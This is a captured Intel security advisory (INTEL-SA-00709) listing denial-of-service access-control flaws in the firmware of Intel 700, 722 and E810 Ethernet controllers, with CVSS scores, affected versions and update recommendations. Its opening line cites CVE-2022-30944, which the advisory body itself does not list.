CVE-2022-30944: INTEL-SA-00709

Improper access control in the firmware for some Intel(R) E810 Ethernet Controllers before version 1.6.2.9 may allow a privileged user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Ethernet Controllers and Adapters Advisory**

**Summary: **

Potential security vulnerabilities in some Intel® Ethernet Controllers and Adapters may allow denial of service.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2021-33126

Description: Improper access control in the firmware for some Intel(R) 700 and 722 Series Ethernet Controllers and Adapters before versions 8.5 and 1.5.5 may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 5.1 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H

CVEID: CVE-2021-33128

Description: Improper access control in the firmware for some Intel(R) E810 Ethernet Controllers before version 1.6.0.6 may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 5.1 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H 

CVEID: CVE-2022-28709

Description: Improper access control in the firmware for some Intel(R) E810 Ethernet Controllers before version 1.6.1.9 may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 4.1 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H

**Affected Products:**

Intel® 700 Series Ethernet Controllers and Adapters before version 8.5.

*   Firmware version, as reported by the device, corresponding to the release numbers above are:  
    
*   Software Release Version 26.6: Device reports 8.5, NVM version 8.50.

Intel® 722 Series Ethernet Controllers and Adapters before version 1.5.5.

*   Firmware version, as reported by the device, corresponding to the release numbers above are:
    *   Software Release Version 26.6: Device reports 1.5.5, NVM version 5.50.

Intel® E810 Ethernet Controllers and Adapters before version 1.6.0.6.

*   Firmware versions, as reported by the device, corresponding to the release numbers above are:
    *   Software Release version 26.4: Device Reports 1.6.0.6., NVM version 3.0.

Intel® E810 Ethernet Controllers and Adapters before version1.6.1.9

*   Firmware versions, as reported by the device, corresponding to the release numbers above are:
    *   Software Release Version 26.8: Device reports 1.6.1.9, NVM version 3.10.

**Recommendations:**

Intel recommends updating the firmware for impacted Intel® Ethernet Controllers and Adapters to the versions provided below or later.

*   Intel® 700 Series Ethernet Controllers and Adapters before version 8.5.
*   Intel® 722 Series Ethernet Controllers and Adapters before version 1.5.5.
*   Intel® E810 Ethernet Controllers and Adapters before version 1.6.1.9

Updates are available for download at this location:

https://downloadcenter.intel.com/product/36773/Ethernet-Products

**Acknowledgements:**

The following issues were found internally by Intel employees.  Intel would like to thank Dmitry Shvarts and Dmitry Tsimbler. 

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

08/09/2022

Initial Release

1.1

08/18/2022

Updated versions for:

CVE-2021-33128, CVE-2022-28709.

Affected products section.

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#intel